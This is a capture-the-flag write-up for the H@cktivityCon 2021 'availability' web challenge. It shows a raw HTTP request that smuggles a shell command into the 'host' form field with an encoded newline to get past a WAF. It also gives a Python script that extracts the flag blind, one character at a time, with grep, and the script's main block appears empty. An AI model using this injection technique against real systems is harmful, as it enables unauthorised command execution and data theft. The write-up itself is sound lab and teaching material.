/ctfs/h@cktivitycon - 2021/web/availability (n%c2%b03 command injection)

Once again, it is pretty much the same challenge. We can again bypass WAF with carriage return.
The only problem for this one is that we are not able to see the result

Host: challenge.ctf.games:31731
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge.ctf.games:31731
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge.ctf.games:31731/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

host= %0A grep 0 flag.txt

Hopefully, there are cannaries values in the response. With the grep command we can deduce if a pattern is or is not in the flag. Plus we know the flag format: flag{< md5 hash >}

Success! Looks like pinging the host &#39; 
 grep 0 flag.txt&#39; worked!
When it's found

Failure! The host &#39; 
 grep 3 flag.txt&#39; was not able to be pinged.
When the pattern is not in the flag

Scripting time !

I wrote a small script to retrieve the whole flag
#! /usr/bin/env python3
#-- all rights: @fey --#
#-- py-version: 3.*  --#

import requests as rq

dic = ["a","b", "c","d","f","1","2","4","5","6","7", "8", "9", "0"]

patterns = []
host = "challenge.ctf.games:31731"

def send_req(pat):
    data={"host":" %s grep %s flag.txt" % ("\n",pat)}
    resp = rq.post(url="http://"+host,data=data)
    return "worked!" in resp.text

def rec(pattern):
    for i in dic:
        if send_req(pattern + i):
          patterns.append(pattern + i)
          print("found:", pattern + i)
          rec(pattern + i)

if __name__ == "__main__":

found: a
found: a0
found: a08
found: a088
found: a08816027174c1
found: a08816027174c14

found: c11d098dd25a08816027174c14f7bf6
found: c11d098dd25a08816027174c14f7bf60

So here is the flag: flag{c11d098dd25a08816027174c14f7bf60}